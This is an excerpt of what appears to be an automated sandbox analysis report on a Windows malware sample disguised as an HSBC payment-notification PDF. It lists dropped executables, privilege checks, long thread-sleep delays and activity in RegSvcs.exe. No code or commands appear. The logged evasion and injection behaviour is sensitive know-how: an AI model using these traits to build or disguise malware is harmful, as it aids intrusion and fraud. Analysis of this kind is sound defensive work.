                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeDropped PE file which has not been started: C:\Windows\System32\msiexec.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeDropped PE file which has not been started: C:\Windows\System32\SensorDataService.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeDropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_11-3883
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_12-3659
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_14-3899
                  Source: C:\Windows\SysWOW64\perfhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_15-50760
                  Source: C:\Windows\System32\Spectrum.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_19-3944
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_21-3883
                  Source: C:\Windows\System32\AppVClient.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_7-3899
                  Source: C:\Windows\SysWOW64\perfhost.exeAPI coverage: 1.7 %
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe TID: 7140Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe TID: 7120Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\msdtc.exe TID: 5364Thread sleep count: 493 > 30Jump to behavior
                  Source: C:\Windows\System32\msdtc.exe TID: 5364Thread sleep time: -49300s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exe TID: 3652Thread sleep count: 5766 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exe TID: 3652Thread sleep time: -57660000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exe TID: 3652Thread sleep count: 4232 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exe TID: 3652Thread sleep time: -42320000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\perfhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599871Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599212Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598894Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598231Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597681Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597317Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597078Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596969Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596608Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596321Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596131Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595943Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595764Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595544Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595309Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595202Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594533Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594297Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594176Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593602Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593247Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593040Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592923Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592682Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592565Jump to behavior
